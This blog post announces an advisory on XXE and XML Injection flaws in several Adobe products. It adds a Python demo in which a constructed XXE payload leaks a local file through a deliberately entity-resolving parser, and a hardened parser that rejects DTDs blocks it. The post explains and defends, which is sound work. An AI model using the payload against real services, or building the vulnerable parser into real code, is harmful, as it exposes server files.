
Multiple Adobe products vulnerable to XML External Entity Injection And XML Injection

I haven't really been posting advisories on this website for the past year, but a series of XML Injection/XXE (XML External Entity) vulnerabilities in Adobe products caught my eye. XML Injection is to web services what XSS is to web pages: attacker-controlled content ends up inside data the application treats as trusted, and the consumer of that data is what gets abused. With XXE the consumer is the XML parser itself, which can be made to read local files or fetch URLs on the attacker's behalf when it resolves an external entity the attacker declared. The advisory linked below gives a good explanation and examples of these rarely discussed attack types.
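To make the attack concrete, here is an added example that is not from the advisory and not Adobe's code: a constructed login request is fed to two small pyexpat-based consumers. The first honours SYSTEM entities the way a mis-configured endpoint would, so a file on the server's disk ends up in the "username" field; the second rejects any DTD and never fetches external entities. The message schema, the file name db.properties and its contents are all made up for the demonstration, and the file:// handling assumes a POSIX path.

```python
"""XXE end to end: one payload against an entity-resolving XML consumer and
against a hardened one. Constructed example using only pyexpat."""
import os
import tempfile
import xml.parsers.expat as expat
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import url2pathname


class DoctypeNotAllowed(ValueError):
    """Raised by the hardened consumer when a request carries a DTD."""


def _username_from(parser, xml_text):
    """Parse a constructed <login><username>..</username></login> request with
    the given pyexpat parser and return the text that lands in <username>."""
    chunks, inside = [], [False]

    def start(name, attrs):
        if name == "username":
            inside[0] = True

    def end(name):
        if name == "username":
            inside[0] = False

    def chars(data):
        if inside[0]:
            chunks.append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return "".join(chunks)


def parse_vulnerable(xml_text):
    """Consumer that honours SYSTEM entities: the entity body is read from the
    local filesystem and delivered to the same handlers as the document."""
    parser = expat.ParserCreate()

    def resolve(context, base, system_id, public_id):
        url = urlparse(system_id)
        if url.scheme != "file":          # this demo only follows file:// URIs
            return 0
        with open(url2pathname(url.path), "rb") as fh:
            body = fh.read()
        # The child parser inherits the parent's handlers, so whatever the file
        # contains becomes character data of the element currently being parsed.
        parser.ExternalEntityParserCreate(context).Parse(body, True)
        return 1

    parser.ExternalEntityRefHandler = resolve
    return _username_from(parser, xml_text)


def parse_hardened(xml_text):
    """Consumer that refuses any DTD and, as a second line of defence, never
    resolves external entities even if a declaration slipped through."""
    parser = expat.ParserCreate()

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeNotAllowed("DTD in request rejected: <!DOCTYPE %s>" % name)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = lambda *args: 1   # skip, do not fetch
    return _username_from(parser, xml_text)


BENIGN_REQUEST = "<login><username>alice</username></login>"


def xxe_payload(target_path):
    """Constructed attacker request: a SYSTEM entity pointing at a local file,
    referenced where the service expects a username."""
    uri = Path(target_path).as_uri()
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE login [<!ENTITY xxe SYSTEM "' + uri + '">]>\n'
            '<login><username>&xxe;</username></login>')


def demo():
    """Return (what the vulnerable consumer leaks, whether the hardened one
    blocked the request). A throw-away file stands in for a config file."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "db.properties")
        with open(secret, "w") as fh:
            fh.write("password=hunter2")          # constructed secret
        payload = xxe_payload(secret)
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            blocked = False
        except DoctypeNotAllowed:
            blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable consumer saw username:", repr(leaked))
    print("hardened consumer rejected the request:", blocked)
```

The hardened consumer still parses the benign request normally; refusing the DOCTYPE outright is preferable to merely ignoring external entities, because it also shuts down entity-expansion denial of service and parameter-entity tricks that a parser-specific "don't resolve" switch may not cover.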

Products affected
  • BlazeDS 3.2 and earlier versions
  • LiveCycle 9.0, 8.2.1, and 8.0.1
  • LiveCycle Data Services 3.0, 2.6.1, and 2.5.1
  • Flex Data Services 2.0.1
  • ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2

For those interested in attacking XML consumers and web services, be sure to also check out the WASC Threat Classification's list of XML-related attacks.

Full Advisory: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
Adobe Patches: http://www.adobe.com/support/security/bulletins/apsb10-05.html
Mitre CVE-2009-3960: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3960


